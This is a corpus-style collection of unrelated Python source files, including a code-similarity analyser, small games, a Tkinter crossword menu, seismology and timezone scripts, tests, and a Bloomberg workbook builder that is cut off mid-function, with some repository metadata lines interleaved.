    '-' lines are tree-one content missing from tree two (dissimilarity);
    '+' lines are content that would have to be added to tree one.
    """
    treeline = astor.dump_tree(treeOne).split('\n')
    treeline2 = astor.dump_tree(treeTwo).split('\n')
    # Splitted both the trees into lists on each new line.
    n = astor.dump_tree(treeOne)
    percentage = 0
    percentageTwo = 0
    #count1 = -1
    #count2 = -1
    # NOTE(review): the first diff line is stored as a percentage while later
    # lines are added as raw character counts -- mixed units; the later
    # division by len(n) assumes raw counts.  Confirm intended formula.
    for line in unified_diff(treeline, treeline2, n=0):
        if line[0] == '-':
            if percentage == 0:
                percentage = (len(line)/len(n))*100
            else:
                percentage = percentage + (len(line))
        if line[0] == '+':
            if percentageTwo == 0:
                percentageTwo = (len(line)/len(n))*100
            else:
                percentageTwo = percentageTwo + (len(line))
    Dissimilarity = round((percentage / len(n)) * 100, 2)
    Similarity = round(100 - (percentage / len(n)) * 100, 2)
    codeToAdd = round((percentageTwo / len(n)) * 100, 2)
    matchedSequences = round(SequenceMatcher(None, ast.dump(treeOne), ast.dump(treeTwo)).ratio() * 100, 2)
    # Blend diff similarity with the sequence-match ratio, scaled toward the
    # rounded-to-ten value of the larger of the two.
    amplify = Similarity + matchedSequences
    amplify = amplify/math.ceil(amplify/100.0) * nearestTen(Similarity, matchedSequences)
    result = round(amplify / 100, 2)
    JsonObject['lines'] = f"Total lines in AST = {len(treeline)}"
    JsonObject['length'] = f"Character length of candidate file = {len(n)}"
    JsonObject['disSimilarity'] = f"Dissimilarity = {Dissimilarity} % "
    JsonObject['probableSimilarity'] = f"Probable Similarity = {Similarity} %"
    JsonObject['modify'] = f"Code to add from reference to candidate will amount to {codeToAdd} %"
    JsonObject['ratio'] = f"Ratio of Matching sequences found = {matchedSequences} %"
    JsonObject['index'] = f"Similarity Index: {result} %"
    JsonObject['i'] = result
    JsonObject['tree'] = n
    #in {(len(treeline)-count1) if(len(treeline)-count1)>0 else 0} lines of AST
    #in {count1} lines of AST
    #of candidate and {count2} lines of AST
'''
Functions to export
'''
def analyseSimilarity(codeOne, codeTwo):
    """Strip docstrings from both code strings, normalize their ASTs, run the
    unified-diff comparison and return the filled ``JsonObject`` as JSON."""
    # Remove triple-quoted docstrings (both quote styles) so documentation
    # differences do not count against similarity.
    docStringRegEx = r'"""[\s\S]*?"""'
    codeOne = re.sub(docStringRegEx, '', codeOne)
    codeTwo = re.sub(docStringRegEx, '', codeTwo)
    docStringRegExTwo = r'\'\'\'[\s\S]*?\'\'\''
    codeOne = re.sub(docStringRegExTwo, '', codeOne)
    codeTwo = re.sub(docStringRegExTwo, '', codeTwo)
    treeOne = ast.parse(codeOne)
    treeTwo = ast.parse(codeTwo)
    # TRANSFORMING THE TREE HERE
    TreeOneTransformed = nodeTransformer().visit(treeOne)
    TreeTwoTransformed = nodeTransformer().visit(treeTwo)
    global JsonObject
    Unified_Diff_Algorithm(TreeOneTransformed, TreeTwoTransformed)
    return json.dumps(JsonObject)
def analyseNodes(codeOne, codeTwo):
    """Visit both code strings' ASTs, swap the collected ``*_helper``
    accumulators into per-file slots, run the per-category comparisons and
    return the filled ``JsonObjectTwo`` as JSON.

    NOTE(review): relies on module-level mutable state, so it is not
    re-entrant or thread-safe.
    """
    treeOne = ast.parse(codeOne)
    treeTwo = ast.parse(codeTwo)
    global expr
    global expr_2
    global expr_helper
    global collect_assign_1
    global collect_assign_2
    global collect_assign_helper
    global collect_call_1
    global collect_call_2
    global collect_call_helper
    global collect_for_1
    global collect_for_2
    global collect_for_helper
    global targetsOne
    global targetsTwo
    global targets
    global JsonObjectTwo
    # VISITING NODES HERE
    nodeVisitor().visit(treeOne)
    # helpers go here
    collect_for_1 = collect_for_helper
    collect_for_helper = []
    collect_call_1 = collect_call_helper
    collect_call_helper = []
    expr = expr_helper
    expr_helper = []
    collect_assign_1 = collect_assign_helper
    collect_assign_helper = []
    targetsOne = targets
    targets = []
    nodeVisitor().visit(treeTwo)
    # helpers go here
    collect_for_2 = collect_for_helper
    collect_for_helper = []
    collect_call_2 = collect_call_helper
    collect_call_helper = []
    expr_2 = expr_helper
    expr_helper = []
    collect_assign_2 = collect_assign_helper
    collect_assign_helper = []
    targetsTwo = targets
    targets = []
    # Per-category similarity percentages.
    r = compareExpr()
    JsonObjectTwo["similarExpressions"] = r
    r = compareNodes(collect_assign_1, collect_assign_2)
    JsonObjectTwo["similarAssignments"] = r
    r = compareNodes(collect_for_1, collect_for_2)
    JsonObjectTwo["similarIterators"] = r
    r = compareNodes(collect_call_1, collect_call_2)
    JsonObjectTwo["similarFunctions"] = r
    r = compareIdentifiers(targetsOne, targetsTwo)
    JsonObjectTwo["similarIdentifiers"] = r
    return json.dumps(JsonObjectTwo)
#!/usr/bin/env python3
"""Read stdin until n distinct normalized lines have been seen.

Lines are lowercased and whitespace-collapsed before being compared.
"""
import sys

n = int(sys.argv[1])

lines_read = 0
seen = set()
for raw in sys.stdin:
    lines_read += 1
    seen.add(" ".join(raw.lower().split()))
    if len(seen) >= n:
        print(f"{n} distinct lines seen after {lines_read} lines read.")
        sys.exit(0)
print(f"End of input reached after {lines_read} lines read - {n} different lines not seen.")
44196669020 | from logging import getLogger
from hornet import models
from .common import ClientCommand
logger = getLogger(__name__)
class Command(ClientCommand):
    """Management command: send a chat message to a Hornet member by id."""
    def add_arguments(self, parser):
        # Positional arguments: target member primary key and message body.
        parser.add_argument("member_id", type=int)
        parser.add_argument("text")

    def handle(self, member_id, text, *args, **kwargs):
        try:
            member = models.Member.objects.get(pk=member_id)
        except models.Member.DoesNotExist:
            # Report to stderr and exit quietly; no exception for bad ids.
            self.stderr.write("Unknown member")
            return
        self.client.send_message(member, text)
| namezys/mandilka | hornet/management/commands/hornet_send_message.py | hornet_send_message.py | py | 567 | python | en | code | 0 | github-code | 50 |
42243755878 | import sys
# Puzzle input: boss hit points and damage, one "Key: value" line each on stdin.
E_HITS, E_D = [int(line.split(': ')[1]) for line in sys.stdin.readlines()]
# Player ("M" = mage) starts with 50 HP and 500 mana.
M_HITS, MANA = 50, 500
SPELLS = [
    # cost, dmg, heal, arm, mana, delay
    (53, 4, 0, 0, 0, 0),        # Magic Missile
    (73, 2, 2, 0, 0, 0),        # Drain
    (113, 0, 0, 7, 0, 6),       # Shield (effect, 6 turns)
    (173, 3, 0, 0, 0, 6),       # Poison (effect, 6 turns)
    (229, 0, 0, 0, 101, 5)      # Recharge (effect, 5 turns)
]
def run(hard):
    """Depth-first search over fight states; return the minimum mana spent to win.

    State tuple: (enemy hp, mage hp, mana, active effects as (spell, turns
    left), is it the mage's turn, mana spent so far).  ``hard`` applies the
    part-two rule: the mage loses 1 HP at the start of each of their turns.
    """
    min_cost = 1e30
    queue = [((E_HITS, M_HITS, MANA, [], True, 0))]
    while queue:
        e_h, m_h, mana, effects, m_turn, cost = queue.pop()
        if cost >= min_cost:
            # Prune: already more expensive than the best known win.
            continue
        if hard and m_turn:
            m_h -= 1
            if m_h <= 0:
                continue
        # Apply all active effects at the start of either side's turn.
        m_arm = 0
        for s, _ in effects:
            effect = SPELLS[s]
            e_h -= effect[1]
            m_h += effect[2]
            m_arm += effect[3]
            mana += effect[4]
        effects = [(s, d-1) for s, d in effects if d > 1]
        if e_h <= 0:
            min_cost = min(cost, min_cost)
            continue
        if m_turn:
            # Branch on every affordable spell not already active.
            for s in range(len(SPELLS)):
                if any(map(lambda e: e[0] == s, effects)):
                    continue # already active
                spell_cost = SPELLS[s][0]
                if spell_cost > mana:
                    continue
                queue.append((e_h, m_h, mana - spell_cost, effects + [(s, SPELLS[s][5])], False, cost + spell_cost))
        else:
            # Boss attack, reduced by armor but always at least 1 damage.
            m_h -= max(1, E_D - m_arm)
            if m_h > 0:
                queue.append((e_h, m_h, mana, effects, True, cost))
    return min_cost
print(run(False))
print(run(True))
| ShuP1/AoC | src/2015/22.py | 22.py | py | 1,546 | python | en | code | 0 | github-code | 50 |
import random

# Hangman-style word guessing game.
# A list of words that
potential_words = ["code", "sisterhood", "program", "empower", "team", "atom", "technology", "notebook", "marker"]
word = random.choice(potential_words)
# Use to test your code:
#print(word)
# Converts the word to lowercase
word = word.lower()
# Make it a list of letters for someone to guess
current_word = [] # TIP: the number of letters should match the word
for i in range(len(word)):
    current_word.append("_")
print (current_word)
# Some useful variables
guesses = []
maxfails = 7
fails = 0
while fails < maxfails:
    guess = input("Guess a letter or word: ")
    # check if the guess is valid: Is it one letter? Have they already guessed it?
    if guess in word:
        if len(guess) == 1: #letter
            for g in range(len(word)):
                if guess == word[g]:
                    current_word[g] = guess
        elif guess == word:
            print ("You have guessed the word!")
            break
    # check if the guess is correct: Is it in the word? If so, reveal the letters!
    print(current_word)
    # NOTE(review): a correct letter still costs a try unless it completes the
    # word, and ``guesses`` is never used for duplicate detection -- confirm
    # whether that is the intended difficulty.
    if "_" in current_word:
        fails = fails+1
        print("You have " + str(maxfails - fails) + " tries left!")
    else:
        print ("You have guessed the word!")
        break
37945910633 | #-----Las biblotecas de uso------------
from tkinter import *
from PIL import ImageTk, Image #importar imagen
from tkinter import messagebox
import os
import subprocess
#-------------------------------------------Metodos para llmar otros proyectos--------------------------
def animales():
    """Launch the 'animales' crossword sub-project in a child interpreter."""
    # Path to the project file to run (relative to the current directory).
    ruta_proyecto = 'animales.py'
    # BUG FIX: FileNotFoundError from subprocess.call only fires when the
    # *interpreter* is missing, not the script file, so check explicitly.
    if not os.path.isfile(ruta_proyecto):
        print(f'El archivo del proyecto no fue encontrado: {ruta_proyecto}')
        return
    try:
        # Run the sub-project in a blocking child process.
        subprocess.call(['python', ruta_proyecto])
    except FileNotFoundError:
        print(f'El archivo del proyecto no fue encontrado: {ruta_proyecto}')
def Paises():
    """Launch the 'paises' crossword sub-project in a child interpreter."""
    # Path to the project file to run (relative to the current directory).
    ruta_proyecto = 'paises.py'
    # BUG FIX: FileNotFoundError from subprocess.call only fires when the
    # *interpreter* is missing, not the script file, so check explicitly.
    if not os.path.isfile(ruta_proyecto):
        print(f'El archivo del proyecto no fue encontrado: {ruta_proyecto}')
        return
    try:
        # Run the sub-project in a blocking child process.
        subprocess.call(['python', ruta_proyecto])
    except FileNotFoundError:
        print(f'El archivo del proyecto no fue encontrado: {ruta_proyecto}')
def Deportes():
    """Launch the 'deportes' crossword sub-project in a child interpreter."""
    # Path to the project file to run (relative to the current directory).
    ruta_proyecto = 'deportes.py'
    # BUG FIX: FileNotFoundError from subprocess.call only fires when the
    # *interpreter* is missing, not the script file, so check explicitly.
    if not os.path.isfile(ruta_proyecto):
        print(f'El archivo del proyecto no fue encontrado: {ruta_proyecto}')
        return
    try:
        # Run the sub-project in a blocking child process.
        subprocess.call(['python', ruta_proyecto])
    except FileNotFoundError:
        print(f'El archivo del proyecto no fue encontrado: {ruta_proyecto}')
#------------------------------------------- Main window -------------------------------
raiz = Tk()  # create the root window
raiz.title("Principal")  # window title
# NOTE(review): `global` at module level is a no-op; these names only matter
# when declared inside a function - confirm this line is intentional.
global dimension_entry,verticales_entry,horizontales_entry,casillas_nulas_entry,palabra_resultante_entry
ancho_ventana = 900
alto_ventana = 600
ancho_pantalla = raiz.winfo_screenwidth()
alto_pantalla = raiz.winfo_screenheight()
# Center the 900x600 window on the screen.
posicion_x = int((ancho_pantalla / 2) - (ancho_ventana / 2))
posicion_y = int((alto_pantalla / 2) - (alto_ventana / 2))
raiz.geometry(f"{ancho_ventana}x{alto_ventana}+{posicion_x}+{posicion_y}") # set window size and position
#----------------------------------------- Main window -------------------------------
#-------------------- Window background ------------------------
imagen_fondo = Image.open("mente.png")
imagen_fondo = ImageTk.PhotoImage(imagen_fondo)
label_fondo = Label(raiz, image=imagen_fondo)
label_fondo.place(x=0, y=0, relwidth=1, relheight=1)
#---------------------------------------------------------------
def abri_ventana():
    """Hide the root window and open the 'Juego Cucigrama' welcome window."""
    global ventana
    raiz.withdraw()  # hide the main (root) window
    global imagen
    ventana= Toplevel(raiz)  # create the secondary window
    ventana.title("Juego Cucigrama")  # window title
    # Same 900x600 centering math as the root window.
    ancho_ventana2 = 900
    alto_ventana2 = 600
    ancho_pantalla2 = ventana.winfo_screenwidth()
    alto_pantalla2 = ventana.winfo_screenheight()
    posicion_x2 = int((ancho_pantalla2 / 2) - (ancho_ventana2 / 2))
    posicion_y2 = int((alto_pantalla2 / 2) - (alto_ventana2 / 2))
    ventana.geometry(f"{ancho_ventana2}x{alto_ventana2}+{posicion_x2}+{posicion_y2}")
    #---------------------------- Background ------------------------------------------------
    # Stored in a global so Tkinter's image is not garbage-collected.
    imagen= ImageTk.PhotoImage(Image.open("mente.png"))
    label_fondo2 = Label(ventana, image=imagen)
    label_fondo2.place(x=0, y=0, relwidth=1, relheight=1)
    #----------------------------------- Main headline of the window ----------------
    label = Label(ventana, text="Bienvenidos al juedo cucigrama", font=("Castellar", 14), fg="white", bg="#c20000")
    label.pack()
    # Button that opens the third (selection) window
    boton_1 = Button(ventana, text="Jugar",font=("Castellar", 14), fg="white", bg="#c20000", command=lambda:ventana_Jugar())
    boton_1.pack(side="right", padx=10, pady=(500, 10))
    # Button to return to the main window
    boton_regresar = Button(ventana, text="➢",font=("Castellar", 14), fg="white", bg="#c20000",command=lambda:regresar_ventana())
    boton_regresar.pack(side="left", padx=10, pady=(500, 10))
    #-------------------------------------------- Selection-window setup ------------------------------------------------
    def ventana_Jugar():
        """Hide the welcome window and open the crossword-selection window."""
        global ventana_usuario
        ventana.withdraw()
        global imagen3
        ventana_usuario= Toplevel(raiz)  # create the window
        ventana_usuario.title("Seleccion")  # window title
        ancho_ventana2 = 900
        alto_ventana2 = 600
        ancho_pantalla2 = ventana_usuario.winfo_screenwidth()
        alto_pantalla2 = ventana_usuario.winfo_screenheight()
        posicion_x2 = int((ancho_pantalla2 / 2) - (ancho_ventana2 / 2))
        posicion_y2 = int((alto_pantalla2 / 2) - (alto_ventana2 / 2))
        ventana_usuario.geometry(f"{ancho_ventana2}x{alto_ventana2}+{posicion_x2}+{posicion_y2}")# set window size and position
        #---------------------------- Background ------------------------------------------------
        imagen3= ImageTk.PhotoImage(Image.open("preguntados.png"))
        label_fondo3 = Label(ventana_usuario, image=imagen3)
        label_fondo3.place(x=0, y=0, relwidth=1, relheight=1)
        #----------------------------------- Main headline of the window ----------------
        label = Label(ventana_usuario, text="Crucigrama", font=("Castellar", 14), fg="white", bg="#c20000")
        label.pack()
        #-------------------------------------- One button per crossword topic ----------------------
        boton_resolver = Button(ventana_usuario, text="Resolver Crucigrama Animales", font=("Castellar", 10), fg="white", bg="#c20000",command=lambda:animales())
        boton_resolver.pack(side="left", padx=10, pady=(500, 10))
        boton_resolver = Button(ventana_usuario, text="Resolver Crucigrama Paises", font=("Castellar", 10), fg="white", bg="#c20000",command=lambda:Paises())
        boton_resolver.pack(side="left", padx=10, pady=(500, 10))
        boton_resolver = Button(ventana_usuario, text="Resolver Crucigrama Deportes", font=("Castellar", 10), fg="white", bg="#c20000",command=lambda:Deportes())
        boton_resolver.pack(side="left", padx=10, pady=(500, 10))
        # Back to the welcome window
        boton_4 = Button(ventana_usuario, text="➢",font=("Castellar", 14), fg="white", bg="#c20000",command=lambda:regresar_juagr())
        boton_4.pack(side="right", padx=10, pady=(500, 10))
#-----------------------------------Metodo de regresara la ventana-------------------------------------------
def regresar_ventana():
    """Close the 'Juego Cucigrama' window and show the root window again."""
    ventana.destroy() # close the "Juego Cucigrama" window
    raiz.deiconify() # show the main window again
def regresar_juagr():
    """Close the selection window and show the welcome window again."""
    ventana_usuario.destroy() # close the selection window
    ventana.deiconify() # show the welcome window again
#-----------------------------------Metodo de regresara la ventana-------------------------------------------
#------------------------ Create the main button -----------------
boton = Button(raiz, text="Iniciar juego",font=("Castellar", 18), fg="white", bg="#c20000",command=lambda:abri_ventana())
boton.pack(side="right", padx=10, pady=(150, 10), anchor="se")
#---------------------- Shown in the window ----------------------------------------
raiz.mainloop() # start the Tk event loop; blocks until the window is closed
#! /usr/bin/env python3
'''
This modules list the files to install/copy.
Used by both nao_sync and createArchive
'''
CHMOD_GO_NONE = 'go= '

'''
Lists, in order, files to install.
Array order determines the order of copying.

Element descriptions
    description: Description of the element
    src: File in Git repo to copy relative to RBB_CHECKOUT_DIR
    dest: Destination on robot/archive to copy to relative to /home/nao
    directory: True if the element to install is a directory of contents
    naosync: True if should be synched by nao_sync
    archive: True if should be included by createArchive
    chmod: chmod rule for nao_sync
'''
# One row per element: (description, src, dest, directory, naosync).
# Every element shares archive=True and the same chmod rule, so those two
# fields are filled in uniformly below instead of being repeated seven times.
_INSTALL_SPECS = [
    ("Authorized Keys",
     "Install/NaoHome/.ssh/authorized_keys", ".ssh/", False, "AllOnly"),
    ("Nao Image home folder",
     "Install/NaoHome", "", True, "Always"),
    ("Robot Configuration Files",
     "Config/Robots", "config/Robots", True, "AllOnly"),
    ("Robot Sound Files",
     "Config/Sounds", "config/Sounds", True, "AllOnly"),
    ("Robot source files (behaviours/config/etc.)",
     "Src/behaviours", "data/behaviours", True, "Always"),
    ("Wireless Profiles",
     "Install/Profiles", "Profiles", True, "AllOnly"),
    ("ML Model Files",
     "Install/MLModels", "data", True, "AllOnly"),
]

installFiles = [
    {
        "description": description,
        "src": src,
        "dest": dest,
        "directory": directory,
        "naosync": naosync,
        "archive": True,
        "chmod": CHMOD_GO_NONE,
    }
    for (description, src, dest, directory, naosync) in _INSTALL_SPECS
]
'''
Lists all of the services to install (and link)
'''
# Service names the installer enables/links on the robot.
services = [
    'alsa-kludge',
    'hal',
    'lola',
    'rbb'
]
| rmit-computing-technologies/redbackbots-coderelease | Make/Common/rbbpython/install.py | install.py | py | 2,439 | python | en | code | 0 | github-code | 50 |
#!/usr/bin/env python
# this program convolves a time function with an mseed file
# John Vidale 6/2019
def pro2_convstf(eq_num, conv_file):
    """Convolve each selected trace of one event with a source-time function.

    Reads the event date from ``EvLocs/event<eq_num>.txt``, convolves every
    trace in the per-event "sel" miniSEED file with the first trace of
    *conv_file*, shifts the start times back 9 s to account for the
    convolution delay, and overwrites the "sel" file in place.

    Parameters
    ----------
    eq_num : int
        Event number used to locate the event description file.
    conv_file : str
        Path to the miniSEED file holding the source-time function.
    """
    from obspy import UTCDateTime
    from obspy import Stream, Trace
    from obspy import read
    import os
    import time
    import numpy as np

    print('Running pro2_con_stfs')
    start_time_wc = time.time()

    taper_frac = .05    # fraction of window tapered on both ends

    # Event metadata: 1-line file of format
    #   event 2016-05-28T09:47:00.000 -56.241 -26.935 78
    fname = '/Users/vidale/Documents/Research/IC/EvLocs/event' + str(eq_num) + '.txt'
    # BUG FIX: the file handle was previously opened and never closed.
    with open(fname, 'r') as file:
        lines = file.readlines()
    split_line = lines[0].split()
    t = UTCDateTime(split_line[1])
    date_label = split_line[1][0:10]
    print('date_label ' + date_label + ' time ' + str(t))

    # Load waveforms and the convolution (source-time function) trace.
    st = Stream()
    con_trace = Stream()
    st_out = Stream()
    tr = Trace()
    fname_sel = '/Users/vidale/Documents/Research/IC/Pro_Files/HD' + date_label + 'sel.mseed'
    st = read(fname_sel)
    con_trace = read(conv_file)
    con_trace.taper(0.5) # added June 10, 2019 to shorten stf
    nt = len(st[0].data)
    dt = st[0].stats.delta
    print('Read in:\n' + str(len(st)) + ' traces' + ' from file ' + conv_file +
          ', \n' + str(nt) + ' time pts, time sampling of '
          + str(dt) + ' and thus duration of ' + str((nt-1)*dt))

    # Detrend and taper before convolving.
    st.detrend(type='simple')
    st.taper(taper_frac)

    done = 0
    for tr in st:  # convolve traces one by one
        tr.data = np.convolve(tr.data, con_trace[0].data)
        # shift timing to reflect convolution delay
        tr.stats.starttime = tr.stats.starttime - 9
        st_out += tr
        done += 1
        if done % 50 == 0:
            print('Done stacking ' + str(done) + ' out of ' + str(len(st)) + ' stations.')

    nt = len(st_out[0].data)
    dt = st_out[0].stats.delta
    print('After detrend and taper:\n' + str(len(st_out)) + ' traces written to file ' + fname_sel +
          ', ' + str(nt) + ' time pts, time sampling of '
          + str(dt) + ' and thus duration of ' + str((nt-1)*dt))

    # Save processed files (overwrites the input selection file).
    st_out.write(fname_sel, format='MSEED')

    elapsed_time_wc = time.time() - start_time_wc
    print('This job took ' + str(elapsed_time_wc) + ' seconds')
    os.system('say "Done"')
import os
import json
import requests
import tarfile
# Directory where the tzdata archive is extracted; shared by the helpers below.
output_directory = "output"
def fetch_IANA_time_zone_database(output_directory):
    """Download the latest IANA tzdata tarball and extract it.

    Parameters
    ----------
    output_directory : str
        Directory the archive contents are extracted into (created if
        missing).

    Exits the process with status 1 when the download fails.
    """
    # API URL for downloading the latest database
    database_api_url = "https://data.iana.org/time-zones/tzdata-latest.tar.gz"

    # Ensure the output directory exists or create it
    os.makedirs(output_directory, exist_ok=True)

    # Fetch the latest database from the API
    print("Fetching latest database from API...")
    response = requests.get(database_api_url)

    if response.status_code != 200:
        print(f"Failed to fetch the database from the API. Status code: {response.status_code}")
        exit(1)

    archive_name = "tzdata-latest.tar.gz"
    # Save the downloaded data to a temporary file.
    with open(archive_name, "wb") as temp_file:
        temp_file.write(response.content)
    try:
        # NOTE(review): extractall() trusts member paths inside the archive;
        # IANA tarballs are well-formed, but consider tarfile's
        # filter="data" (Python 3.12+) for defence in depth.
        with tarfile.open(archive_name, "r:gz") as tar:
            tar.extractall(output_directory)
    finally:
        # BUG FIX: always remove the downloaded archive, even when
        # extraction raises (previously it was leaked on failure).
        os.remove(archive_name)

    print("Database extraction completed.")
def create_country_to_time_zone_mapping():
    """Parse zone1970.tab and map each country-code column to its zones.

    Returns a dict keyed by the raw (possibly comma-separated) country-code
    field, each value being the list of time-zone names for that field.
    """
    print("Creating country to timezones mapping...")

    # zone1970.tab lives inside the extracted tzdata tree.
    zone_tab_file = os.path.join(output_directory, "zone1970.tab")

    mapping = {}
    with open(zone_tab_file, "r") as handle:
        for raw_line in handle:
            # Skip blank lines and '#' comment lines.
            if not raw_line.strip() or raw_line.startswith("#"):
                continue
            columns = raw_line.split()
            if len(columns) < 3:
                continue
            codes, zone = columns[0], columns[2]
            mapping.setdefault(codes, []).append(zone)
    return mapping
def dump_time_zone_details(country_to_timezones):
    """Merge per-country time zones and write them to a JSON file.

    Parameters
    ----------
    country_to_timezones : dict[str, list[str]]
        Keys may contain several comma-separated country codes (as produced
        by zone1970.tab parsing); each code inherits the key's zone list.

    Writes the merged mapping to ``country_to_timezones.json`` in the
    current directory.
    """
    print("Dumping your file to JSON...")

    # Group the time zones by individual country code.
    country_timezones = {}
    for country_codes, timezones in country_to_timezones.items():
        # A key such as "US,CA" applies to every listed country.
        for country_code in country_codes.split(','):
            country_code = country_code.strip()
            country_timezones.setdefault(country_code, []).extend(timezones)

    # Path of the JSON file that stores the mapping.
    json_file_path = "country_to_timezones.json"
    with open(json_file_path, "w") as json_file:
        json.dump(country_timezones, json_file, indent=2)

    print(f"Mapping saved to {json_file_path}")
fetch_IANA_time_zone_database(output_directory)
dump_time_zone_details(create_country_to_time_zone_mapping())
| shan-shaji/country-code-from-timezone | refresh.py | refresh.py | py | 3,196 | python | en | code | 0 | github-code | 50 |
import pytest
import uuid
from os.path import exists, join
from src.report_generator import ReportGenerator
from tests import utils as test_utils
@pytest.fixture
def rep_gen(tmp_path):
    """Build a ReportGenerator wired to a per-test temporary reports folder.

    The generator's ``filename`` is overridden with a random, extension-less
    path inside the temp folder so each test writes unique output files.
    """
    temp_reports = tmp_path / 'reports'
    temp_reports.mkdir()
    _rep_gen=ReportGenerator(reports_folder=temp_reports, temps_folder=test_utils.TEMPLATE_FOLDER, data=test_utils.data)
    _rep_gen.filename = join(temp_reports, str(uuid.uuid4()).replace('-', ''))
    return _rep_gen
def test_to_pdf(rep_gen, tmp_path):
    """The PDF report must only appear on disk after to_pdf() runs."""
    output_pdf = rep_gen.filename + ".pdf"
    assert exists(tmp_path / 'reports')
    assert not exists(output_pdf)
    rep_gen.to_pdf(test_utils.TEMPLATE_FILE)
    assert exists(output_pdf)
def test_to_xml(rep_gen, tmp_path):
    """The XML report must only appear on disk after to_xml() runs."""
    output_xml = rep_gen.filename + ".xml"
    assert exists(tmp_path / 'reports')
    assert not exists(output_xml)
    rep_gen.to_xml()
    assert exists(output_xml)
def test_run(rep_gen):
    '''Ensure that both the PDF and XML reports are generated and saved to the filesystem
    '''
    # Both reports are absent before run() and present afterwards.
    expected_files = [rep_gen.filename + ext for ext in (".pdf", ".xml")]
    for report in expected_files:
        assert not exists(report)
    rep_gen.run(test_utils.TEMPLATE_FILE)
    for report in expected_files:
        assert exists(report)
    # The filename property exposes the path without any extension.
    assert rep_gen.filename
    assert '.' not in rep_gen.filename
| d2gex/py-rep-to-pdf_xml | tests/test_report_generator.py | test_report_generator.py | py | 1,449 | python | en | code | 0 | github-code | 50 |
"""Api - Puzzle api
Usage: api run [--config <file>]
api serve [--config <file>]
api --help
api --version
Options:
-h --help Show this screen.
--config <file> Set config file. [default: site.cfg]
Subcommands:
run - Start the web server in the foreground. Don't use for production.
serve - Starts a daemon web server with Gevent.
"""
from __future__ import print_function
from __future__ import absolute_import
from gevent import monkey
monkey.patch_all()
from docopt import docopt
from .app import make_app
from api.tools import loadConfig
def main():
    """CLI entry point: parse docopt arguments and dispatch to run()/serve()."""
    args = docopt(__doc__, version="0.0")
    config_file = args["--config"]
    appconfig = loadConfig(config_file)
    cookie_secret = appconfig.get("SECURE_COOKIE_SECRET")
    if args["run"]:
        run(config_file, cookie_secret=cookie_secret)
    if args["serve"]:
        serve(config_file, cookie_secret=cookie_secret)


def run(config_file, cookie_secret):
    "Start the web server in the foreground. Don't use for production."
    app = make_app(
        config=config_file, cookie_secret=cookie_secret, database_writable=True
    )
    app.run(
        host=app.config.get("HOSTAPI"),
        port=app.config.get("PORTAPI"),
        use_reloader=True,
    )


def serve(config_file, cookie_secret):
    """Serve the app with a gevent WSGI server and graceful SIGTERM/SIGINT
    shutdown."""
    from gevent import pywsgi, signal_handler
    import signal

    app = make_app(
        config=config_file, cookie_secret=cookie_secret, database_writable=True
    )
    host = app.config.get("HOSTAPI")
    port = app.config.get("PORTAPI")
    print("serving on {host}:{port}".format(**locals()))
    server = pywsgi.WSGIServer((host, port), app)

    def shutdown():
        # Stop accepting connections, then exit with the TERM status.
        app.logger.info("api is being shutdown")
        server.stop(timeout=10)
        exit(signal.SIGTERM)

    signal_handler(signal.SIGTERM, shutdown)
    signal_handler(signal.SIGINT, shutdown)
    server.serve_forever(stop_timeout=10)


# BUG FIX: this guard used to sit *above* the run()/serve() definitions, so
# invoking the script raised NameError inside main() before they existed.
# Dispatch only after every function has been defined.
if __name__ == "__main__":
    main()
| jkenlooper/puzzle-massive | api/api/script.py | script.py | py | 1,993 | python | en | code | 31 | github-code | 50 |
from scipy.optimize import minimize
import numpy as np
import pandas as pd
import datetime as dt
import copy
import matplotlib.pyplot as plt
from sklearn.linear_model import LinearRegression
import sklearn
import time
import math
import plotly.express as px
import plotly.graph_objects as go
from cvxpy import *
from scipy.optimize import nnls
#import scipy.optimize
from datetime import datetime
from scipy.optimize import nnls
import seaborn as sns
import urllib
from sqlalchemy import create_engine
import pyodbc
import yfinance as yf
import investpy
import openpyxl
from openpyxl import Workbook
from openpyxl.utils import get_column_letter, FORMULAE
from datetime import timedelta
import database_directory
# Module-wide MS Access connection; every query below reuses this engine.
conn_str = database_directory.main()
cnn_url = f"access+pyodbc:///?odbc_connect={urllib.parse.quote_plus(conn_str)}"
acc_engine = create_engine(cnn_url)
def download_bloomberg_tickers(hist_data,update_days_time):
    """Build an Excel workbook of Bloomberg BDH() formulas for index prices.

    With ``hist_data=True`` full history (from 01/01/2000) is requested for
    Bloomberg instruments not yet present in PriceIndex; otherwise only the
    last *update_days_time* days are requested for instruments already
    stored.  The workbook is saved to a fixed network share; presumably it
    is then opened in Excel with the Bloomberg add-in, which resolves the
    BDH() formulas - confirm with the downstream workflow.
    """
    # All "Index"-type instruments, split into Bloomberg / non-Bloomberg ids.
    df_fund_index = pd.read_sql("SELECT * FROM AssetIndex ",acc_engine).sort_values("ID_INSTRUMENT")
    df_fund_index = df_fund_index[df_fund_index["Instrument_Type"] == "Index"]
    bb_ids = list(df_fund_index[df_fund_index["data_source"] == "bloomberg"]["ID_INSTRUMENT"].values)
    non_bb_ids = list(df_fund_index[df_fund_index["data_source"] != "bloomberg"]["ID_INSTRUMENT"].values)
    old_bb_ids = list(pd.read_sql("SELECT ID_INSTRUMENT FROM PriceIndex",acc_engine).sort_values("ID_INSTRUMENT")["ID_INSTRUMENT"].unique())
    # Symmetric differences isolate Bloomberg ids that already have stored
    # prices (old_bb_ids) and those never downloaded before (new_bb_ids).
    old_bb_ids = list(set(old_bb_ids).symmetric_difference(set(non_bb_ids)))
    new_bb_ids = list(set(old_bb_ids).symmetric_difference(set(bb_ids)))
    wb = Workbook()
    ws1 = wb.active
    ws1["A1"] = "ISIN"
    ws1["A2"] = "BB_Ticker"
    if hist_data == True:
        # Full history for instruments that are new to PriceIndex.
        start_date = "01/01/2000"
        df_fund_index = df_fund_index[np.isin(df_fund_index, new_bb_ids).any(axis=1)]
        days_ret = 5900
    else:
        # Incremental update covering the last `update_days_time` days.
        start_date = datetime.today() - timedelta(days=update_days_time)
        start_date = start_date.strftime("%d/%m/%Y")
        df_fund_index = df_fund_index[np.isin(df_fund_index, old_bb_ids).any(axis=1)]
        days_ret = update_days_time
    # One column per instrument: row 1 = ISIN, row 2 = ticker, row 3 = BDH().
    for i in range(0,len(df_fund_index["ID_INSTRUMENT"])):
        column_number = i+2
        letter_columns = get_column_letter(column_number)
        row_value_1 =letter_columns +str(1)
        row_value_2 = letter_columns + str(2)
        row_value_3 = letter_columns +str(3)
        id_instrument = df_fund_index["ID_INSTRUMENT"].iloc[i]
        # NOTE(review): df_price_exists is computed but never used here.
